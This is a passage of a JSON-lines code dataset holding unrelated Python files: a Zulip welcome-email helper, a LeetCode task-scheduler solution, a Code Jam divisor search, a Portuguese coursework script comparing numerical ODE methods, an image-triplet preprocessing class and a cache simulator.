(settings.WELCOME_EMAIL_SENDER is not None):\n from_name = settings.WELCOME_EMAIL_SENDER['name']\n from_address = settings.WELCOME_EMAIL_SENDER['email']\n else:\n from_name = None\n from_address = FromAddress.SUPPORT\n unsubscribe_link = one_click_unsubscribe_link(user, 'welcome')\n context = common_context(user)\n context.update({\n 'unsubscribe_link': unsubscribe_link,\n 'organization_setup_advice_link': (user.realm.uri + '%s/help/getting-your-organization-started-with-zulip'),\n 'is_realm_admin': user.is_realm_admin,\n })\n send_future_email('zerver/emails/followup_day1', user.realm, to_user_id=user.id, from_name=from_name, from_address=from_address, context=context)\n send_future_email('zerver/emails/followup_day2', user.realm, to_user_id=user.id, from_name=from_name, from_address=from_address, context=context, delay=datetime.timedelta(days=1))\n","sub_path":"Data Set/bug-fixing-1/e2a42650c9b067869c50247c7945ef847fbbf806--bug.py","file_name":"e2a42650c9b067869c50247c7945ef847fbbf806--bug.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"542088995","text":"# https://leetcode.com/problems/task-scheduler/submissions/\n# General Explanation: https://www.youtube.com/watch?v=s8p8ukTyA2I\n\"\"\"\nHeap sort with greedy algorithm\nIn general, for problems that ask for a maximum or a minimum under some constraint\n(for example, all arrangements in which no two identical characters are adjacent),\nconsider heap sort + greedy.\nRelated:\nTask Scheduler\nReorganize String\nMeeting Rooms\n\"\"\"\nimport heapq\nfrom collections import Counter, deque\nfrom typing import List\n\nclass Solution:\n def leastInterval(self, tasks: List[str], n: int) -> int:\n count = Counter(tasks)\n maxHeap = [-cnt for cnt in count.values()]\n heapq.heapify(maxHeap)\n q = deque()\n time = 0\n while maxHeap or q:\n time += 1\n if maxHeap:\n cnt = heapq.heappop(maxHeap) + 1\n if cnt:\n q.append((cnt, time + n))\n if q and q[0][1] == time:\n heapq.heappush(maxHeap, q.popleft()[0])\n return time","sub_path":"most_interviewed/heap/task_scheduler.py","file_name":"task_scheduler.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"111323329","text":"#!/usr/bin/python3\n\nimport scipy as sp # noqa\nimport math # noqa\n\n\ndef next_line_to_ints(lines):\n return map(int, next(lines).split(' '))\n\n# Don't check stuff that is not divisible by something smaller than 8000\nmax_checked = 8000\n\n\ndef first_divisor(n):\n \"\"\"\n Returns None if prime, otherwise the first divisor\n \"\"\"\n max_divisor = math.sqrt(n)\n\n # Not needed since it is uneven\n # if n == 2:\n # return None\n # if n % 2 == 0:\n # return 2\n\n d = 3\n while d <= max_divisor and d < max_checked:\n if n % d == 0:\n return d\n d += 2\n return None\n\nf_in = open('c.in')\nf_out = open('c.out', 'w')\n\nlines = (i for i in f_in.read().splitlines())\nt = int(next(lines))\n\nn, j = tuple(next_line_to_ints(lines))\n\nf_out.write('Case #1:\\n')\n\nfor i in range(2**(n-2)):\n s = \"1{}1\".format(format(i, '030b'))\n\n divisors = []\n\n for base in range(2, 11):\n div = first_divisor(int(s, base))\n\n if div is None:\n break\n\n divisors.append(div)\n\n else:\n j -= 1\n output = '{} {}\\n'.format(s, ' '.join(map(str, divisors)))\n f_out.write(output)\n print(j, output)\n\n if j == 0:\n break\n","sub_path":"codes/CodeJamCrawler/16_0_3/JelteF/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"98769023","text":"# -*- coding: utf-8 -*-\r\n\"\"\" \r\nMAP5725 - Prof. 
Alexandre Roma\r\nAluna: Karina Yukimi Peixoto Sakurai - 9796634\r\nTarefa 2\r\n\"\"\"\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef phi_Euler(t,y,dt,f): # Função de discretização do Método de Euler\r\n \r\n k1 = f(t, y)\r\n \r\n return k1\r\n\r\ndef phi_EulerImplicito(t,y,dt,f): # Função de discretização do Método de Euler Implícito\r\n \r\n A = np.array([[0,1],[-4*(t**2), 1/t]])\r\n I = np.array([[1,0],[0, 1]])\r\n M = I - dt*A\r\n k1 = f(t + dt, np.linalg.inv(M).dot(y))\r\n \r\n return k1\r\n\r\ndef phi_Trapezio(t,y,dt,f): # Função de discretização do Método do Trapézio\r\n \r\n k1 = f(t, y)\r\n A = np.array([[0,1],[-4*(t**2), 1/t]])\r\n I = np.array([[1,0],[0, 1]])\r\n M = I - (dt/2)*A\r\n N = I + (dt/2)*A\r\n k2 = f(t+dt, np.linalg.inv(M).dot(N).dot(y))\r\n \r\n return (k1 + k2)/2\r\n\r\ndef f(t, y):\r\n \r\n f0 = y[1]\r\n f1 = y[1]/t - 4*(t**2)*y[0]\r\n \r\n return np.array([f0,f1])\r\n\r\ndef sol_exata(t): # Função que calcula a solução exata para um t específico\r\n\r\n sol = np.array([math.sin(t**2), 2*t*math.cos(t**2)])\r\n \r\n return sol\r\n\r\n#Lendo comandos\r\nprint(\"Tarefa 2 \\n\")\r\nprint(\"Opções disponíveis: \\n\")\r\n\r\nprint(\"** Métodos Numéricos: **\\n\")\r\n\r\nprint(\"-> Digite '1' para Método de Euler\")\r\nprint(\"-> Digite '2' para Método de Euler Implícito\")\r\nprint(\"-> Digite '3' para Método do Trapézio\")\r\nprint(\"-> Digite '4' para gerar um gráfico comparativo de métodos e solução exata \\n\")\r\n\r\nprint(\"** Tabela de convergência e erro de discretização: **\\n\")\r\n\r\nprint(\"-> Digite '5' para gerar tabela para o Método de Euler\")\r\nprint(\"-> Digite '6' para gerar tabela para o Método de Euler Implícito\")\r\nprint(\"-> Digite '7' para gerar tabela para o Método do Trapézio \\n\")\r\n\r\nprint(\"** Gráficos com aproximações numéricas para diferentes valores de dt: **\\n\")\r\nprint(\"-> Digite '8' para gerar aproximações usando o Método de Euler\")\r\nprint(\"-> Digite '9' para gerar aproximações usando o Método de Euler Implícito\")\r\nprint(\"-> Digite '10' para gerar aproximações usando o Método do Trapézio\")\r\n\r\nprint(\"** CASO 2: Problema de Cauchy Genérico\\n\")\r\n\r\nprint(\"-> Digite '11' para gerar tabela para o Método de Euler\")\r\nprint(\"-> Digite '12' para gerar tabela para o Método de Euler Implícito\")\r\nprint(\"-> Digite '13' para gerar tabela para o Método do Trapézio \\n\")\r\n\r\nopcao = input()\r\n\r\nt_n = [math.sqrt(math.pi)]; T = 10; # Intervalo de tempo\r\ny_n = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n\r\n#Estes vetores serão utilizados caso a opção '4' for selecionada\r\ny_n1 = [np.array([0,-2*math.sqrt(math.pi)])]\r\ny_n2 = [np.array([0,-2*math.sqrt(math.pi)])]\r\ny_n3 = [np.array([0,-2*math.sqrt(math.pi)])]\r\ny_exata = [np.array([0,-2*math.sqrt(math.pi)])]\r\n\r\nn = 2**17 # Discretização do intervalo de tempo\r\ndt = (T-t_n[-1])/n\r\n\r\nif (opcao != '1' and opcao != '2' and opcao != '3' and opcao != '4' and opcao != '5' and opcao != '6' and opcao != '7'\r\n and opcao != '8' and opcao != '9' and opcao != '10' and opcao != '11' and opcao != '12' and opcao != '13'):\r\n \r\n print(\"Entrada inválida. 
Fim do programa.\")\r\n \r\nelse:\r\n \r\n opcao = int(opcao)\r\n\r\n # *********** Opções 1, 2, 3 e 4 ***********\r\n\r\n if (opcao <= 4): \r\n \r\n while t_n[-1] < T:\r\n \r\n y = 0\r\n \r\n if (opcao == 1):\r\n \r\n y = y_n[-1] + dt*phi_Euler(t_n[-1],y_n[-1],dt,f) #Chamada Método de Euler\r\n y_n.append(y)\r\n \r\n elif (opcao == 2):\r\n \r\n y = y_n[-1] + dt*phi_EulerImplicito(t_n[-1],y_n[-1],dt,f) #Chamada Método de Euler Implícito\r\n y_n.append(y)\r\n \r\n elif (opcao == 3):\r\n \r\n y = y_n[-1] + dt*phi_Trapezio(t_n[-1],y_n[-1],dt,f) #Chamada Método do Trapézio\r\n y_n.append(y) \r\n\r\n elif (opcao == 4):\r\n #Neste caso foi escolhido o método 4, os 3 métodos serão gerados simultaneamente. \r\n y_n1.append(y_n1[-1] + dt*phi_Euler(t_n[-1],y_n1[-1],dt,f))\r\n y_n2.append(y_n2[-1] + dt*phi_EulerImplicito(t_n[-1],y_n2[-1],dt,f))\r\n y_n3.append(y_n3[-1] + dt*phi_Trapezio(t_n[-1],y_n3[-1],dt,f))\r\n y_exata.append(sol_exata(t_n[-1]))\r\n\r\n t_n.append(t_n[-1] + dt)\r\n dt = min(dt, T-t_n[-1])\r\n\r\n if (t_n[-1] == T):\r\n aprox = y\r\n\r\n if (opcao != 4): # Opções 1, 2 e 3\r\n\r\n y_n = np.array(y_n)\r\n \r\n # Plotando gráfico de x em função de t\r\n plt.plot(t_n, y_n[:,0], 'k-.', markersize=0.1)\r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('x(t)')\r\n if (opcao == 1):\r\n plt.title('Método de Euler - Gráfico x(t)')\r\n elif (opcao == 2):\r\n plt.title('Método de Euler Implícito - Gráfico x(t)')\r\n else:\r\n plt.title('Método do Trapézio - Gráfico x(t)')\r\n plt.show()\r\n\r\n # Plotando gráfico de y em função de t\r\n plt.plot(t_n, y_n[:,1], 'k-.', markersize=0.1)\r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('y(t)')\r\n if (opcao == 1):\r\n plt.title('Método de Euler - Gráfico y(t)')\r\n elif (opcao == 2):\r\n plt.title('Método de Euler Implícito - Gráfico y(t)')\r\n else:\r\n plt.title('Método do Trapézio - Gráfico y(t)')\r\n plt.show()\r\n\r\n else: # Opção 4\r\n\r\n y_n1 = np.array(y_n1)\r\n y_n2 = np.array(y_n2)\r\n y_n3 = np.array(y_n3)\r\n y_exata = np.array(y_exata)\r\n\r\n # Plotando gráfico de x em função de t\r\n plt.plot(t_n, y_n1[:,0], 'k--', markersize=0.1, label = 'Euler')\r\n plt.plot(t_n, y_n2[:,0], 'k-.', markersize=0.1, label = 'Euler Implícito')\r\n plt.plot(t_n, y_n3[:,0], 'k+', markersize=0.1, label = 'Trapézio')\r\n plt.plot(t_n, y_exata[:,0], 'k-', markersize=0.1, label = 'Solução Exata')\r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('x(t)')\r\n plt.title('Comparativos de Métodos n = 2**17 - Gráfico x(t)')\r\n plt.show()\r\n\r\n # Plotando gráfico de y em função de t\r\n plt.plot(t_n, y_n1[:,1], 'k--', markersize=0.1, label = 'Euler')\r\n plt.plot(t_n, y_n2[:,1], 'k-.', markersize=0.1, label = 'Euler Implícito')\r\n plt.plot(t_n, y_n3[:,1], 'k+', markersize=0.1, label = 'Trapézio')\r\n plt.plot(t_n, y_exata[:,1], 'k-', markersize=0.1, label = 'Solução Exata')\r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('y(t)')\r\n plt.title('Comparativos de Métodos n = 2**17 - Gráfico y(t)')\r\n plt.show()\r\n\r\n # *********** Opções 5, 6 e 7: Gerar tabelas de convergência e erro de discretização global *********** \r\n\r\n if (opcao >= 5 and opcao <= 7):\r\n\r\n potencia = [2,5,10,15,18]\r\n linha = []\r\n erro = 0\r\n erro2 = 0\r\n \r\n for item in potencia:\r\n n = 2**item\r\n t_n = [math.sqrt(math.pi)]; T = 10; # Intervalo de tempo\r\n y_n = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n y_exata = [np.array([0,-2*math.sqrt(math.pi)])]\r\n dt = (T-t_n[-1])/n\r\n \r\n while t_n[-1] < T:\r\n if 
(opcao == 5):\r\n \r\n y_n.append(y_n[-1] + dt*phi_Euler(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando Euler\r\n \r\n elif (opcao == 6):\r\n \r\n y_n.append(y_n[-1] + dt*phi_EulerImplicito(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando Euler Implícito\r\n \r\n elif (opcao == 7):\r\n \r\n y_n.append(y_n[-1] + dt*phi_Trapezio(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando o método do trapezio \r\n\r\n y_exata.append(sol_exata(t_n[-1]))\r\n t_n.append(t_n[-1] + dt)\r\n dt = min(dt, T-t_n[-1])\r\n\r\n # Para cálculo da ordem de convergência\r\n t_n2 = [math.sqrt(math.pi)]; T = 10; # Intervalo de tempo\r\n y_n2 = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n dt = (T-t_n2[-1])/n\r\n dt = 2*dt\r\n\r\n while t_n2[-1] < T:\r\n if (opcao == 5):\r\n \r\n y_n2.append(y_n2[-1] + dt*phi_Euler(t_n2[-1],y_n2[-1],dt,f)) # Cálculo de y usando Euler\r\n \r\n elif (opcao == 6):\r\n \r\n y_n2.append(y_n2[-1] + dt*phi_EulerImplicito(t_n2[-1],y_n2[-1],dt,f)) # Cálculo de y usando Euler Implícito\r\n \r\n elif (opcao == 7):\r\n \r\n y_n2.append(y_n2[-1] + dt*phi_Trapezio(t_n2[-1],y_n2[-1],dt,f)) # Cálculo de y usando o método do trapezio\r\n \r\n t_n2.append(t_n2[-1] + dt)\r\n dt = min(dt, T-t_n2[-1])\r\n \r\n erro = y_exata[len(y_exata) - 1] - y_n[len(y_n) - 1]\r\n erro2 = y_n2[len(y_n2) - 1] - y_n[len(y_n) - 1]\r\n q = erro2/erro\r\n linha.append([n, dt, \"{:.2e}\".format(abs(erro[0])), \"{:.2e}\".format(abs(erro2[1])), \"{:.2e}\".format(abs(q[0])), \"{:.2e}\".format(abs(q[1]))])\r\n \r\n linha = np.array(linha)\r\n print(\"n ----- dt ----- erro_x ---- erro_y ---- q_x ---- q_y\")\r\n print(linha)\r\n \r\n # *********** Métodos 8, 9 e 10 ***********\r\n\r\n if (opcao >= 8 and opcao <= 10):\r\n\r\n potencia = [12, 15, 18] # Potências utilizadas no cálculo de n (número de passos)\r\n dados = [] # Variável que vai armazenar listas de y para cada n\r\n estilo = [\"k:\",\"k-.\",\"k--\"] # Estilo de linhas para os gráficos \r\n\r\n _y = []\r\n _t = []\r\n \r\n for item in potencia:\r\n\r\n t_n = [math.sqrt(math.pi)]; T = 10; # Inicializando intervalo de tempo\r\n y_n = [np.array([0,-2*math.sqrt(math.pi)])] # Inicializando condições iniciais (x0, y0)\r\n n = 2**item # Número de passos de iteração (discretização do intervalo)\r\n dt = (T-t_n[-1])/n # Tamanho do passo de iteração\r\n y = 0 # Inicialização da variável y\r\n \r\n while t_n[-1] < T:\r\n \r\n if (opcao == 8):\r\n \r\n y = y_n[-1] + dt*phi_Euler(t_n[-1],y_n[-1],dt,f) # Chamada método Euler para cálculo de y_{n+1}\r\n \r\n elif (opcao == 9):\r\n \r\n y = y_n[-1] + dt*phi_EulerImplicito(t_n[-1],y_n[-1],dt,f) # Chamada método Euler Implícito para cálculo de y_{n+1}\r\n \r\n elif (opcao == 10):\r\n \r\n y = y_n[-1] + dt*phi_Trapezio(t_n[-1],y_n[-1],dt,f) # Chamada método do trapézio para cálculo de y_{n+1}\r\n\r\n y_n.append(y) # Adicionando y calculado na lista de valores de y\r\n t_n.append(t_n[-1] + dt) # Adicionando t atual na lista de valores de t\r\n dt = min(dt, T-t_n[-1]) \r\n\r\n _y.append(y_n)\r\n _t.append(t_n)\r\n\r\n legenda = \"\"\r\n\r\n # Plotando gráfico de x em função de t\r\n for item in range(len(potencia)):\r\n\r\n y_n = _y[item]\r\n t_n = _t[item]\r\n y_n = np.array(y_n)\r\n pot = str(potencia[item])\r\n legenda = \"n = 2**\"+pot\r\n\r\n plt.plot(t_n, y_n[:,0], estilo[item], label = legenda, markersize=0.1) \r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('x(t)')\r\n plt.legend(loc='upper left')\r\n if (opcao == 8):\r\n legenda = \"Euler\"\r\n plt.title('Método de Euler - Gráfico x(t)')\r\n elif (opcao == 
9):\r\n legenda = \"Euler Implícito\"\r\n plt.title('Método de Euler Implícito - Gráfico x(t)')\r\n else:\r\n legenda = \"Trapézio\"\r\n plt.title('Método do Trapézio - Gráfico x(t)')\r\n \r\n plt.show()\r\n\r\n # Plotando gráfico de y em função de t\r\n for item in range(len(potencia)):\r\n\r\n y_n = _y[item]\r\n t_n = _t[item]\r\n y_n = np.array(y_n)\r\n pot = str(potencia[item])\r\n legenda = \"n = 2**\"+pot\r\n\r\n plt.plot(t_n, y_n[:,1], estilo[item], label = legenda, markersize=0.1) \r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('y(t)')\r\n plt.legend(loc='upper left')\r\n if (opcao == 8):\r\n legenda = \"Euler\"\r\n plt.title('Método de Euler - Gráfico y(t)')\r\n elif (opcao == 9):\r\n legenda = \"Euler Implícito\"\r\n plt.title('Método de Euler Implícito - Gráfico y(t)')\r\n else:\r\n legenda = \"Trapézio\"\r\n plt.title('Método do Trapézio - Gráfico y(t)')\r\n \r\n plt.show()\r\n \r\n# *********** Opções 11, 12 e 13: CASO 2 - Problema de Cauchy Genérico *********** \r\n\r\n if (opcao >= 11 and opcao <= 13):\r\n\r\n potencia = [2,5,10,15,18]\r\n linha = []\r\n \r\n for item in potencia:\r\n n = 2**item\r\n t_n = [math.sqrt(math.pi)]; # Intervalo de tempo\r\n y_n = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n y_exata = [np.array([0,-2*math.sqrt(math.pi)])]\r\n dt = (T-t_n[-1])/n\r\n \r\n while t_n[-1] < T:\r\n if (opcao == 11):\r\n \r\n y_n.append(y_n[-1] + dt*phi_Euler(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando Euler\r\n \r\n elif (opcao == 12):\r\n \r\n y_n.append(y_n[-1] + dt*phi_EulerImplicito(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando Euler Implícito\r\n \r\n elif (opcao == 13):\r\n \r\n y_n.append(y_n[-1] + dt*phi_Trapezio(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando o método do trapezio \r\n\r\n t_n.append(t_n[-1] + dt)\r\n dt = min(dt, T-t_n[-1])\r\n # Para cálculo da ordem de convergência\r\n t_n2 = [math.sqrt(math.pi)]; # Intervalo de tempo\r\n y_n2 = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n t_nMeio = [math.sqrt(math.pi)]; # Intervalo de tempo\r\n y_nMeio = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n dt2 = 2*(T-t_n2[-1])/n\r\n dtMeio = (T-t_n2[-1])/(2*n)\r\n while t_n2[-1] < T:\r\n if (opcao == 11):\r\n \r\n y_n2.append(y_n2[-1] + dt2*phi_Euler(t_n2[-1],y_n2[-1],dt2,f)) # Cálculo de y usando Euler\r\n \r\n elif (opcao == 12):\r\n \r\n y_n2.append(y_n2[-1] + dt2*phi_EulerImplicito(t_n2[-1],y_n2[-1],dt2,f)) # Cálculo de y usando Euler Implícito\r\n \r\n elif (opcao == 13):\r\n \r\n y_n2.append(y_n2[-1] + dt2*phi_Trapezio(t_n2[-1],y_n2[-1],dt2,f)) # Cálculo de y usando o método do trapezio\r\n \r\n t_n2.append(t_n2[-1] + dt2)\r\n dt2 = min(dt2, T-t_n2[-1])\r\n\r\n while t_nMeio[-1] < T:\r\n if (opcao == 11):\r\n\r\n y_nMeio.append(y_nMeio[-1] + dtMeio*phi_Euler(t_nMeio[-1],y_nMeio[-1],dtMeio,f))\r\n \r\n elif (opcao == 12):\r\n\r\n y_nMeio.append(y_nMeio[-1] + dtMeio*phi_EulerImplicito(t_nMeio[-1],y_nMeio[-1],dtMeio,f))\r\n \r\n elif(opcao == 13):\r\n\r\n y_nMeio.append(y_nMeio[-1] + dtMeio*phi_Trapezio(t_nMeio[-1],y_nMeio[-1],dtMeio,f))\r\n \r\n t_nMeio.append(t_nMeio[-1] + dtMeio)\r\n dtMeio = min(dtMeio, T-t_nMeio[-1])\r\n\r\n\r\n numerador = y_n2[len(y_n2) - 1] - y_n[len(y_n) - 1]\r\n denominador = y_n[len(y_n) - 1] - y_nMeio[len(y_nMeio) - 1]\r\n \r\n resx = abs(numerador[0]/denominador[0])\r\n px = math.log(resx, 2) #Cálculo da ordem de convergência aprox na variável x\r\n \r\n resy = abs(numerador[1]/denominador[1])\r\n py = math.log(resy, 2) #Cálculo da ordem de 
convergência aprox na variavel y\r\n \r\n linha.append([item, n, dt, \"{:.2e}\".format(y_n[len(y_n) - 1][0]), \"{:.2e}\".format(y_n[len(y_n) - 1][1]), \"{:.2e}\".format(px), \"{:.2e}\".format(py)])\r\n \r\n linha = np.array(linha)\r\n print(\"m ----- n = 2^m ----- dt ----- \\eta_x ----- \\eta_y ---- px ----- py\")\r\n print(linha)\r\n","sub_path":"codigo-completo.py","file_name":"codigo-completo.py","file_ext":"py","file_size_in_byte":19193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"294423016","text":"import os\nfrom matplotlib.image import imread\nimport numpy as np\n\n\nclass PreProcessing:\n\n images_train = np.array([])\n images_test = np.array([])\n labels_train = np.array([])\n labels_test = np.array([])\n unique_train_label = np.array([])\n map_train_label_indices = dict()\n\n def __init__(self,data_src, dataMode):\n self.data_src = data_src\n self.data_mode = dataMode\n print(\"Loading Geological Similarity Dataset...\")\n self.images, self.labels = self.preprocessing()\n self.unique_label = np.unique(self.labels)\n self.map_label_indices = {label: np.flatnonzero(self.labels == label) for label in\n self.unique_label}\n print('Preprocessing Done. Summary:')\n print(\"Images :\", self.images.shape)\n print(\"Labels :\", self.labels.shape)\n print(\"Unique label :\", self.unique_label)\n\n def normalize(self,x):\n min_val = np.min(x)\n max_val = np.max(x)\n x = (x - min_val) / (max_val - min_val)\n return x\n\n def read_dataset(self):\n X = []\n y = []\n minDirectory = 0\n maxDirectory = 100\n if self.data_mode == \"training\":\n minDirectory = 0\n maxDirectory = 64\n elif self.data_mode == \"validation\":\n minDirectory = 65\n maxDirectory = 84\n elif self.data_mode == \"test\":\n minDirectory = 85\n maxDirectory = 100\n print(\"Setting min directory to %d and max directory to %d in data mode %s\" %(minDirectory, maxDirectory, self.data_mode))\n for directory in os.listdir(self.data_src):\n if directory.startswith(\".\"):\n continue\n # pick which directories you would like to read based on data mode\n if int(directory) < minDirectory or int(directory) > maxDirectory:\n continue\n try:\n for pic in os.listdir(os.path.join(self.data_src, directory)):\n img = imread(os.path.join(self.data_src, directory, pic))\n X.append(np.squeeze(np.asarray(img)))\n y.append(directory)\n except Exception as e:\n print('Failed to read images from Directory: ', directory)\n print('Exception Message: ', e)\n print('Dataset loaded successfully.')\n return X,y\n\n def preprocessing(self):\n X, y = self.read_dataset()\n labels = list(set(y))\n label_dict = dict(zip(labels, range(len(labels))))\n Y = np.asarray([label_dict[label] for label in y])\n X = [self.normalize(x) for x in X] # normalize images\n\n shuffle_indices = np.random.permutation(np.arange(len(y)))\n x_shuffled = []\n y_shuffled = []\n for index in shuffle_indices:\n x_shuffled.append(X[index])\n y_shuffled.append(Y[index])\n\n return np.asarray(x_shuffled), np.asarray(y_shuffled)\n\n\n def get_triplets(self):\n label_l, label_r = np.random.choice(self.unique_label, 2, replace=False)\n a, p = np.random.choice(self.map_label_indices[label_l],2, replace=False)\n n = np.random.choice(self.map_label_indices[label_r])\n return a, p, n\n\n def get_triplets_batch(self,n):\n idxs_a, idxs_p, idxs_n = [], [], []\n for _ in range(n):\n a, p, n = self.get_triplets()\n idxs_a.append(a)\n idxs_p.append(p)\n idxs_n.append(n)\n return self.images[idxs_a,:], self.images[idxs_p, :], 
self.images[idxs_n, :]\n\n","sub_path":"class_based_preprocessing.py","file_name":"class_based_preprocessing.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"94862350","text":"from cacheReal import *\nimport argparse\nimport copy\nimport os\nimport time\nimport sys\n\nexperiment_type = sys.argv[1]\nfile_name_extension = sys.argv[2]\n\nclass Simulator:\n def __init__(self, dim, capacity, no_objects, alpha, iter, update_interval, learning_rate):\n self.grid_d = 313\n\n self.obj_catalogue = ObjectCatalogueGrid(self.grid_d, self.grid_d, experiment_type) \n\n self.cache = CacheGridReal(capacity, dim, learning_rate, True, [self.grid_d, self.grid_d])\n\n self.cache.initializeIterativeSearch([self.grid_d, self.grid_d])\n \n self.iter = iter\n\n self.u_interval = update_interval\n\n self.descent = StochasticGradientDescent(learning_rate, self.grid_d)\n\n self.plot = Plots(experiment_type, file_name_extension)\n\n self.initial_points = self.cache.getAllPoints() \n\n self.learning_rate = learning_rate\n\n os.system(\"mkdir \" + str(self.grid_d) + \"_\" + str(learning_rate) + \"_\" + experiment_type + \"_\" + file_name_extension) \n \n self.cache_capacity = capacity\n\n def write_stat(self, i, obj, f, cache_size):\n f.write(str(i) + \"\\t\" + str(obj) + \"\\t\" + str(cache_size))\n f.write(\"\\n\")\n f.flush()\n \n def write_rare_requests(self, req, np, f):\n f.write(' '.join([str(r) for r in req]))\n f.write(' ')\n f.write(' '.join([str(p) for p in np]))\n f.write('\\n')\n f.flush()\n \n def write_distance_count(self, distance_count, f):\n for d in distance_count:\n f.write(str(d) + \" \" + str(distance_count[d]) + \"\\n\")\n f.flush()\n\n def write_stat_debug(self, f2, obj, nearest_obj, mapped_x, mapped_y):\n f2.write(\"Request : \" + ' '.join([str(x) for x in obj]) + \" Nearest : \" + ' '.join([str(x) for x in nearest_obj]) + \" Mapped : \" + str(mapped_x) + \" \" + str(mapped_y) + '\\n')\n f2.flush()\n\n def simulate(self):\n\n def l1_dist(p1, p2):\n return np.linalg.norm(p1 - p2, ord=1)\n\n objective = [] \n objective_value = 0\n \n count = 0\n prev_i = 0\n jump_interval = 1\n\n number_obj = len(self.cache.getAllPoints())\n\n f = open(str(self.grid_d) + '_' + str(self.learning_rate) + '_' + experiment_type + '_' + file_name_extension + '/' + str(\"objective\") + '.txt', 'w') \n f2 = open(str(self.grid_d) + '_' + str(self.learning_rate) + '_' + experiment_type + '_' + file_name_extension + '/' + str(\"debug\") + '.txt', 'w') \n cost = 0\n\n Threshold = 10\n\n for i in range(1,self.iter):\n\n if experiment_type == \"uniform\" :\n obj = self.obj_catalogue.getRequest()\n elif experiment_type == \"gaussian\" :\n obj = self.obj_catalogue.getRequestGaussian()\n elif experiment_type == \"gaussian2\" :\n obj = self.obj_catalogue.getRequestGaussian2()\n elif experiment_type == \"gaussian_real\" :\n obj = self.obj_catalogue.getRequestGaussian2()\n\n pos = obj\n\n if i % self.u_interval == 0: \n\n \n if i - prev_i >= jump_interval:\n \n #objective_value = self.obj_catalogue.objective_l1_iterative_threaded(self.cache, experiment_type) \n #objective_value = objective_value/(self.obj_catalogue.total_rate)\n \n objective_value = float(cost)/jump_interval\n\n objective.append(objective_value)\n\n\n number_points = len(self.cache.getAllPoints())\n\n print(\"iter : \", i, \"objective : \", objective_value, number_points)\n\n self.write_stat(i, objective_value, f, number_points) \n\n if i < 100000 and i == 10 * 
jump_interval:\n jump_interval *= 10\n elif i == 100000 and i == 10 * jump_interval:\n pass\n elif i == 100 * jump_interval:\n jump_interval *= 10\n\n prev_i = i\n\n self.plot.plot_cache_pos_grid(self.cache.getAllPoints(), self.obj_catalogue.means, self.initial_points, count, [self.grid_d, self.grid_d], self.learning_rate)\n count += 1 \n\n cost = 0\n\n\n if experiment_type != \"gaussian_real\": \n [nearest_obj, dst, mapped_x, mapped_y] = self.cache.findNearest(pos) \n new_object_loc = self.descent.descent(nearest_obj, obj) \n self.cache.updateCacheDict(nearest_obj, new_object_loc, mapped_x, mapped_y) \n\n else :\n if i < 4 * self.grid_d: \n if len(self.cache.getAllPoints()) < self.grid_d:\n self.cache.insertInit(obj)\n continue\n\n [nearest_obj, dst, mapped_x, mapped_y] = self.cache.findNearestVirtual(pos) \n\n new_object_loc = self.descent.descent(nearest_obj, obj, \"gaussian_real\") \n\n ## Update the required tables after descending\n self.cache.updateVirtualObjectAndFreq(nearest_obj, new_object_loc, mapped_x, mapped_y) \n \n #no_points = len(self.cache.getAllPoints())\n\n if dst <= Threshold : ## Virtual hit\n\n mapped_real_object = self.cache.getReal(new_object_loc)\n\n print(\" Mapped real object : \", mapped_real_object, \" Requested object : \", obj)\n dist = l1_dist(pos, mapped_real_object)\n\n ## If the object in catalogue is the nearest real object to the virtual object\n if dist <= 1: \n cost += dist\n \n ## If there is an object which is closer to the virtual object\n elif dist <= Threshold : # physical hit\n #print(\" Physical hit \")\n\n ## With some probability insert the object never the less\n check_if_in_real_cache = (obj[0] == mapped_real_object[0] and obj[1] == mapped_real_object[1])\n dst2 = l1_dist(np.array([mapped_real_object[0], mapped_real_object[1]]), np.array([nearest_obj[0], nearest_obj[1]]))\n if_better_object = dst < dst2\n\n if random.random() < 0.02 and check_if_in_real_cache == False and if_better_object: \n #print(\"Evicting and inserting a new object \", obj)\n self.cache.insert(obj)\n cost += Threshold \n cost += dst\n else:\n cost += l1_dist(mapped_real_object, obj)\n else:\n ## it is a virtual hit and a physical miss, so fetch the nearest object in the cache and insert\n ## the object in the cache\n\n nearest_catalogue = self.obj_catalogue.nearestObject(nearest_obj)\n nearest_catalogue = np.array([nearest_catalogue[0], nearest_catalogue[1]])\n \n approx_cost = l1_dist(nearest_catalogue, obj) \n\n if approx_cost <= Threshold: \n ## We should almost always end up here \n #print(\"Evicting and inserting a new object \", obj) \n cost += Threshold\n cost += approx_cost\n self.cache.insert(nearest_catalogue)\n else :\n cost += Threshold\n\n else:\n [nearest_obj, dst, mapped_x, mapped_y] = self.cache.findNearestReal(pos) \n\n if dst <= Threshold: ## physical hit and virtual 